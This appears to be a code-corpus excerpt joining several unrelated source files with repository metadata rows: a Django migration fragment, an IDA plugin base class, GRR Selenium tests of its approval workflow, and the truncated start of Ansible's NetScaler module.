'widget': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'challenge_mgr.pageinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'PageInfo'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'introduction': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'unlock_condition': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '255'}),
'url': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'})
},
'challenge_mgr.pagesetting': {
'Meta': {'ordering': "['page', 'location', 'priority']", 'unique_together': "(('page', 'widget'),)", 'object_name': 'PageSetting'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'Left'", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.PageInfo']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'widget': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.roundsetting': {
'Meta': {'ordering': "['start']", 'object_name': 'RoundSetting'},
'display_scoreboard': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 3, 4, 9, 51, 46, 415018)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Round 1'", 'max_length': '50'}),
'round_reset': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 25, 9, 51, 46, 414965)'})
},
'challenge_mgr.sponsor': {
'Meta': {'ordering': "['priority', 'name']", 'object_name': 'Sponsor'},
'challenge': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.ChallengeSetting']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'logo_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': "'1'"}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'challenge_mgr.uploadimage': {
'Meta': {'object_name': 'UploadImage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['challenge_mgr']
| gpl-3.0 | 3,453,334,790,086,132,000 | 77.1 | 176 | 0.555814 | false |
xujun10110/DIE | DIE/Lib/DataPluginBase.py | 8 | 6517 |
import logging
from yapsy.PluginManager import IPlugin
from DIE.Lib.ParsedValue import ParsedValue
from idaapi import *
from idautils import *
from idc import *
class DataPluginBase(IPlugin):
"""
DIE Data Parser plugin base class.
"""
name = ""
version = 0
description = ""
author = ""
is_activated = True
    supported_types = []  # supported_types holds tuples of (supported type name, type description)
type = None # The value type (or None if unidentified).
loc = None # The value (memory) location.
rawValue = None # The raw value to be parsed.
parsedValues = [] # List of the parsed values.
typeName_norm_cb = None # Type name normalizer callback function
def __init__(self):
self.logger = logging.getLogger(__name__)
self.type_params = None # Currently parsed type parameters
def initPlugin(self, type_norm_callback=None):
"""
        Plugin initialization.
@param type_norm_callback: a type name normalization callback function
"""
idaapi.msg("Initializing plugin %s\n" % self.__class__)
# Set type name normalization callback function
if type_norm_callback is not None:
self.typeName_norm_cb = type_norm_callback
# Register supported types
self.registerSupportedTypes()
def guessValues(self, rawData):
"""
"Abstract" method to be implemented by successors
If type is not known, used to guess possible values matching rawData.
        @param rawData: Raw data whose type should be guessed.
"""
def matchType(self, type):
"""
"Abstract" method to be implemented by successors.
Checks if the type is supported by the current plugin.
        @param type: A type_info_t object to match
@return: True if a match was found, otherwise False
"""
return True
def parseValue(self, rawData):
"""
"Abstract" method to be implemented by successors.
If type is known, Parses the value.
        @param rawData: Raw data whose type should be parsed.
@param type: IDA type_info_t object
"""
def registerSupportedTypes(self):
"""
A parser can register supported types in order to allow quick parser lookups.
types are registered by their type name string value.
registration should be made using self.addSuportedType()
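        Illustrative sketch (hypothetical type names) of what a subclass
        might do here:
            self.addSuportedType("CHAR*", "ascii")
            self.addSuportedType("INT", "")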
"""
def run(self, rawData, type, match_override=False):
"""
Run Plugin
@param rawData: the raw data to be parsed
@param type: data type (None if unknown)
@param match_override: set this flag in order to bypass the plugin type matching method.
@return: DebugValue array with the parsed data
"""
try:
self.parsedValues = [] # Initialize parsed value list
# If type was not recognized, try to guess the value.
if type is None:
self.guessValues(rawData)
return self.parsedValues
# If bypass match flag is set, force parsing.
if match_override:
self.parseValue(rawData)
return self.parsedValues
# Otherwise, if type matches the plugin parser type, run the parser logic.
if self.matchType(type):
self.parseValue(rawData)
return self.parsedValues
except Exception as ex:
self.logger.exception("Error while running plugin: %s", ex)
def setPluginType(self, type):
"""
Set the plugin type string that will be associated with values parsed by this parser
@param type: Type string (e.g. "INT")
@return: True if type was successfully set, otherwise False.
"""
try:
self.type = type.lower()
except Exception as ex:
self.logger.exception("Setting plugin type failed: %s", ex)
return False
def addSuportedType(self, type_name, type_desc):
"""
Add supported type to supported type list
@param type_name: supported type name string
@param type_desc: type description
"""
# type description must not be Null. set to an empty string by default.
try:
if type_desc is None:
type_desc = ""
            if self.typeName_norm_cb is not None:
                type_name = self.typeName_norm_cb(type_name)
type_tuple = (type_name, type_desc)
if not type_tuple in self.supported_types:
self.supported_types.append(type_tuple)
except Exception as ex:
self.logger.exception("Failed to add supported type: %s", ex)
def checkSupportedType(self, type):
"""
Check if a type name string is supported
        @param type: IDA type_info_t object
@return: True if type name is supported or otherwise False
"""
try:
tname = idaapi.print_tinfo('', 0, 0, idaapi.PRTYPE_1LINE, type, '', '')
type_name = None
if self.typeName_norm_cb is not None:
type_name = self.typeName_norm_cb(tname)
for (stype, sparams) in self.supported_types:
if type_name == stype:
self.type_params = sparams
return True
return False
except Exception as ex:
self.logger.exception("Error while checking for supported type: %s", ex)
def getSupportedTypes(self):
"""
Get a list in which each element is a tuple that contains:
[1] supported type name
[2] type description parameters
(type names are strings stripped of all spaces, e.g "UNSIGNED CHAR *" will be returned as "UNSIGNEDCHAR*")
@return: list of TypeTuples
"""
if len(self.supported_types) > 0:
return self.supported_types
else:
return None
def addParsedvalue(self, value, score=0, description="NoN", raw=None):
"""
Add a parsed value to the parsed value list
"""
parsed_val = ParsedValue(value, description, score, raw, self.type)
self.parsedValues.append(parsed_val)
def getParsedValues(self):
"""
Get the parsed values list
@return: Parsed value list (with 'ParsedValue' element types)
"""
return self.parsedValues
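# A minimal sketch (hypothetical, not part of DIE) of a concrete parser built
# on DataPluginBase. It is kept as a comment so the yapsy plugin manager does
# not try to load it; the type name, score and parsing logic are illustrative:
#
#   class IntParser(DataPluginBase):
#       def registerSupportedTypes(self):
#           self.addSuportedType("int", "")
#           self.setPluginType("INT")
#
#       def parseValue(self, rawData):
#           try:
#               self.addParsedvalue(int(str(rawData), 0), score=10,
#                                   description="Integer", raw=rawData)
#           except (TypeError, ValueError):
#               pass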
| mit | 6,281,305,150,474,836,000 | 32.081218 | 120 | 0.59644 | false |
ojengwa/grr | gui/plugins/acl_manager_test.py | 2 | 24429 | #!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""Tests the access control authorization workflow."""
import re
import time
import urlparse
from grr.gui import runtests_test
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import email_alerts
from grr.lib import flags
from grr.lib import flow
from grr.lib import hunts
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.aff4_objects import cronjobs
class TestACLWorkflow(test_lib.GRRSeleniumTest):
"""Tests the access control workflow."""
  # Using a Unicode string for the test here would be optimal, but Selenium
# can't correctly enter Unicode text into forms.
reason = "Felt like it!"
def CreateSampleHunt(self, token=None):
with hunts.GRRHunt.StartHunt(
hunt_name="SampleHunt",
regex_rules=[rdfvalue.ForemanAttributeRegex(
attribute_name="GRR client",
attribute_regex="GRR")],
token=token or self.token) as hunt:
return hunt.session_id
def WaitForNotification(self, user):
sleep_time = 0.2
iterations = 50
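    # Poll for up to ~10 seconds (50 iterations x 0.2s) before failing.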
for _ in xrange(iterations):
try:
fd = aff4.FACTORY.Open(user, "GRRUser", mode="r", ignore_cache=True,
token=self.token)
pending_notifications = fd.Get(fd.Schema.PENDING_NOTIFICATIONS)
if pending_notifications:
return
except IOError:
pass
time.sleep(sleep_time)
self.fail("Notification for user %s never sent." % user)
def testClientACLWorkflow(self):
self.Open("/")
self.Type("client_query", "0001")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000001",
self.GetText, "css=span[type=subject]")
# Choose client 1
self.Click("css=td:contains('0001')")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.ClickUntilNotVisible("acl_dialog_submit")
self.WaitForNotification("aff4:/users/test")
# User test logs in as an approver.
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=td:contains('grant access to GRR client')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for C.0000000000000001 to test")
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible("css=td:contains('has granted you access')")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
# Lets add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(client_id="C.0000000000000001",
flow_name="GrantClientApprovalFlow",
reason=self.reason, delegate="test",
subject_urn=rdfvalue.ClientURN("C.0000000000000001"),
token=token)
# Try again:
self.Open("/")
self.Click("notification_button")
self.ClickUntilNotVisible("css=td:contains('has granted you access')")
self.Click("css=span:contains('fs')")
# This is ok - it should work now
self.WaitUntilContains("aff4:/C.0000000000000001/fs",
self.GetText, "css=h3:contains('fs')")
# One email for the original request and one for each approval.
self.assertEqual(len(self.emails_sent), 3)
def testRecentReasonBox(self):
test_reason = u"ástæða"
self.Open("/")
with self.ACLChecksDisabled():
token = access_control.ACLToken(
username="test",
reason=test_reason)
self.GrantClientApproval("C.0000000000000006", token=token)
self.Type("client_query", "0006")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000006",
self.GetText, "css=span[type=subject]")
# Choose client 6
self.Click("css=td:contains('0006')")
self.WaitUntil(self.IsTextPresent, u"Access reason: %s" % test_reason)
# By now we should have a recent reason set, let's see if it shows up in the
# ACL dialog.
self.Type("client_query", "0001")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000001",
self.GetText, "css=span[type=subject]")
# Choose client 1
self.Click("css=td:contains('0001')")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
options = self.GetText("css=select[id=acl_recent_reasons]").split("\n")
self.assertEqual(len(options), 2)
self.assertEqual(options[0].strip(), "Enter New Reason...")
self.assertEqual(options[1].strip(), test_reason)
# The reason text box should be there and enabled.
element = self.GetElement("css=input[id=acl_reason]")
self.assertTrue(element.is_enabled())
self.Select("css=select[id=acl_recent_reasons]", test_reason)
# Make sure clicking the recent reason greys out the reason text box.
element = self.GetElement("css=input[id=acl_reason]")
self.assertFalse(element.is_enabled())
# Ok now submit this.
self.Type("css=input[id=acl_approver]", "test")
self.ClickUntilNotVisible("acl_dialog_submit")
# And make sure the approval was created...
fd = aff4.FACTORY.Open("aff4:/ACL/C.0000000000000001/test",
token=self.token)
approvals = list(fd.ListChildren())
self.assertEqual(len(approvals), 1)
# ... using the correct reason.
self.assertEqual(
utils.SmartUnicode(approvals[0].Basename().decode("base64")),
test_reason)
def testHuntACLWorkflow(self):
with self.ACLChecksDisabled():
hunt_id = self.CreateSampleHunt()
# Open up and click on View Hunts.
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Select a Hunt.
self.Click("css=td:contains('SampleHunt')")
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.Click("acl_dialog_submit")
# "Request Approval" dialog should go away
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitForNotification("aff4:/users/test")
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=td:contains('Please grant access to hunt')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
# Hunt overview should be visible
self.WaitUntil(self.IsTextPresent, "SampleHunt")
self.WaitUntil(self.IsTextPresent, "Hunt ID")
self.WaitUntil(self.IsTextPresent, "Hunt URN")
self.WaitUntil(self.IsTextPresent, "Clients Scheduled")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for %s to test" % hunt_id)
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.WaitUntil(self.GetText,
"css=td:contains('has granted you access to hunt')")
self.ClickUntilNotVisible(
"css=tr:contains('has granted you access') a")
# Run SampleHunt (it should be selected by default).
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
    # Let's add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt_id, reason=self.reason,
delegate="test",
token=token)
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=tr:contains('has granted you access') a")
# Wait for modal backdrop to go away.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Run SampleHunt (it should be selected by default).
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is still insufficient - one of the approvers should have
# "admin" label.
self.WaitUntilContains("At least 1 approver(s) should have 'admin' label.",
self.GetText, "css=div#acl_form")
# Let's make "approver" an admin.
with self.ACLChecksDisabled():
self.CreateAdminUser("approver")
# And try again
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Select and run SampleHunt.
self.Click("css=td:contains('SampleHunt')")
# Run SampleHunt (it should be selected by default).
self.WaitUntil(self.IsTextPresent, "SampleHunt")
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for the success status message.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt started successfully!")
def Create2HuntsForDifferentUsers(self):
# Create 2 hunts. Hunt1 by "otheruser" and hunt2 by "test".
# Both hunts will be approved by user "approver".
with self.ACLChecksDisabled():
hunt1_id = self.CreateSampleHunt(
token=access_control.ACLToken(username="otheruser"))
hunt2_id = self.CreateSampleHunt(
token=access_control.ACLToken(username="test"))
self.CreateAdminUser("approver")
token = access_control.ACLToken(username="otheruser")
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=hunt1_id,
reason=self.reason,
approver="approver",
token=token)
token = access_control.ACLToken(username="test")
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=hunt2_id,
reason=self.reason,
approver="approver",
token=token)
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt1_id, reason=self.reason,
delegate="otheruser",
token=token)
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt2_id, reason=self.reason,
delegate="test",
token=token)
def testHuntApprovalsArePerHunt(self):
with self.ACLChecksDisabled():
self.Create2HuntsForDifferentUsers()
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
#
# Check that test user can't start/pause/modify hunt1.
#
self.Click("css=tr:contains('SampleHunt') td:contains('otheruser')")
# Run hunt
# Click on Run button and check that dialog appears.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsTextPresent, "Create a new approval")
self.WaitUntil(self.IsTextPresent, "No approvals available")
self.Click("css=#acl_dialog button[name=Close]")
# Wait for dialog to disappear.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=ModifyHunt]:not([disabled])")
# Modify hunt
# Click on Modify button and check that dialog appears.
self.Click("css=button[name=ModifyHunt]")
self.WaitUntil(self.IsTextPresent, "Modify a hunt")
self.WaitUntil(self.IsElementPresent, "css=input[id=v_-client_limit]")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("name=Proceed")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsTextPresent, "Create a new approval")
self.WaitUntil(self.IsTextPresent, "No approvals available")
self.Click("css=#acl_dialog button[name=Close]")
# Wait for dialog to disappear.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
#
# Check that test user can start/pause/modify hunt2.
#
self.Click("css=tr:contains('SampleHunt') td:contains('test')")
# Run hunt
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt started successfully")
self.assertTrue(self.IsElementPresent(
"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=PauseHunt]:not([disabled])")
# Pause hunt
# Click on Pause and wait for dialog again.
self.Click("css=button[name=PauseHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to pause this hunt?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt paused successfully")
self.assertTrue(self.IsElementPresent(
"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=ModifyHunt]:not([disabled])")
# Modify hunt
# Click on Modify button and check that dialog appears.
self.Click("css=button[name=ModifyHunt]")
self.WaitUntil(self.IsTextPresent,
"Modify a hunt")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt modified successfully!")
self.assertTrue(self.IsElementPresent(
"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
def testCronJobACLWorkflow(self):
with self.ACLChecksDisabled():
cronjobs.ScheduleSystemCronFlows(token=self.token)
cronjobs.CRON_MANAGER.DisableJob(
rdfvalue.RDFURN("aff4:/cron/OSBreakDown"))
# Open up and click on Cron Job Viewer.
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageCron]")
# Select a cron job
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable button and check that dialog appears.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.Click("acl_dialog_submit")
# "Request Approval" dialog should go away
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.Click("css=td:contains('Please grant access to a cron job')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
# Cron job overview should be visible
self.WaitUntil(self.IsTextPresent, "aff4:/cron/OSBreakDown")
self.WaitUntil(self.IsTextPresent, "CRON_ARGS")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for aff4:/cron/OSBreakDown to test")
# Now test starts up
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.WaitUntil(self.GetText,
"css=td:contains('has granted you access to "
"a cron job')")
self.Click("css=tr:contains('has granted you access') a")
# Enable OSBreakDown cron job (it should be selected by default).
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable and wait for dialog again.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
    # Let's add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(
flow_name="GrantCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN("aff4:/cron/OSBreakDown"),
reason=self.reason, delegate="test", token=token)
# Now test starts up
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.Click("css=tr:contains('has granted you access') a")
# Wait for modal backdrop to go away.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsTextPresent, "OSBreakDown")
# Enable OSBreakDown cron job (it should be selected by default).
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is still insufficient - one of the approvers should have
# "admin" label.
self.WaitUntilContains("At least 1 approver(s) should have 'admin' label.",
self.GetText, "css=div#acl_form")
# Let's make "approver" an admin.
with self.ACLChecksDisabled():
self.CreateAdminUser("approver")
# And try again
self.Open("/")
self.Click("css=a[grrtarget=ManageCron]")
# Select and enable OSBreakDown cron job.
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable button and check that dialog appears.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Cron job was ENABLEd successfully!")
def testEmailClientApprovalRequestLinkLeadsToACorrectPage(self):
with self.ACLChecksDisabled():
client_id = self.SetupClients(1)[0]
messages_sent = []
def SendEmailStub(unused_from_user, unused_to_user, unused_subject,
message, **unused_kwargs):
messages_sent.append(message)
# Request client approval, it will trigger an email message.
with utils.Stubber(email_alerts, "SendEmail", SendEmailStub):
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="RequestClientApprovalFlow",
reason="Please please let me",
subject_urn=client_id,
approver="test",
token=rdfvalue.ACLToken(username="iwantapproval",
reason="test"))
self.assertEqual(len(messages_sent), 1)
# Extract link from the message text and open it.
m = re.search(r"href='(.+?)'", messages_sent[0], re.MULTILINE)
link = urlparse.urlparse(m.group(1))
self.Open(link.path + "?" + link.query + "#" + link.fragment)
# Check that requestor's username and reason are correctly displayed.
self.WaitUntil(self.IsTextPresent, "iwantapproval")
self.WaitUntil(self.IsTextPresent, "Please please let me")
# Check that host information is displayed.
self.WaitUntil(self.IsTextPresent, str(client_id))
self.WaitUntil(self.IsTextPresent, "HOSTNAME")
self.WaitUntil(self.IsTextPresent, "MAC_ADDRESS")
def main(argv):
# Run the full test suite
runtests_test.SeleniumTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 | -9,013,492,060,328,073,000 | 36.291603 | 80 | 0.654426 | false |
photoninger/ansible | lib/ansible/modules/network/citrix/_netscaler.py | 15 | 4873 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Nandor Sivok <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netscaler
version_added: "1.1"
short_description: Manages Citrix NetScaler entities
description:
- Manages Citrix NetScaler server and service entities.
deprecated: In 2.4 use M(netscaler_service) and M(netscaler_server) instead.
options:
nsc_host:
description:
- Hostname or ip of your netscaler.
required: true
nsc_protocol:
description:
- Protocol used to access netscaler.
default: https
user:
description:
- Username.
required: true
password:
description:
- Password.
required: true
action:
description:
- The action you want to perform on the entity.
choices: [ disable, enable ]
default: disable
name:
description:
- Name of the entity.
required: true
default: hostname
type:
description:
- Type of the entity.
choices: [ server, service ]
default: server
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated.
- This should only be used on personally controlled sites using self-signed certificates.
type: bool
default: 'yes'
author:
- Nandor Sivok (@dominis)
'''
EXAMPLES = '''
- name: Disable the server
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
- name: Enable the server
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
action: enable
- name: Disable the service local:8080
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
name: local:8080
type: service
action: disable
'''
import base64
import json
import socket
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils._text import to_native
from ansible.module_utils.urls import fetch_url
class netscaler(object):
_nitro_base_url = '/nitro/v1/'
def __init__(self, module):
self.module = module
def http_request(self, api_endpoint, data_json=None):
        data_json = {} if data_json is None else data_json
request_url = self._nsc_protocol + '://' + self._nsc_host + self._nitro_base_url + api_endpoint
data_json = urlencode(data_json)
if not len(data_json):
data_json = None
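        # The Nitro API uses HTTP Basic auth; build the Authorization header
        # from the configured NetScaler credentials.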
auth = base64.encodestring('%s:%s' % (self._nsc_user, self._nsc_pass)).replace('\n', '').strip()
headers = {
'Authorization': 'Basic %s' % auth,
'Content-Type': 'application/x-www-form-urlencoded',
}
response, info = fetch_url(self.module, request_url, data=data_json, headers=headers)
return json.load(response)
def prepare_request(self, action):
resp = self.http_request(
'config',
{
"object":
{
"params": {"action": action},
self._type: {"name": self._name}
}
}
)
return resp
def core(module):
n = netscaler(module)
n._nsc_host = module.params.get('nsc_host')
n._nsc_user = module.params.get('user')
n._nsc_pass = module.params.get('password')
n._nsc_protocol = module.params.get('nsc_protocol')
n._name = module.params.get('name')
n._type = module.params.get('type')
action = module.params.get('action')
r = n.prepare_request(action)
return r['errorcode'], r
def main():
module = AnsibleModule(
argument_spec=dict(
nsc_host=dict(type='str', required=True),
nsc_protocol=dict(type='str', default='https'),
user=dict(type='str', required=True),
password=dict(type='str', required=True, no_log=True),
            action=dict(type='str', default='disable', choices=['disable', 'enable']),
name=dict(type='str', default=socket.gethostname()),
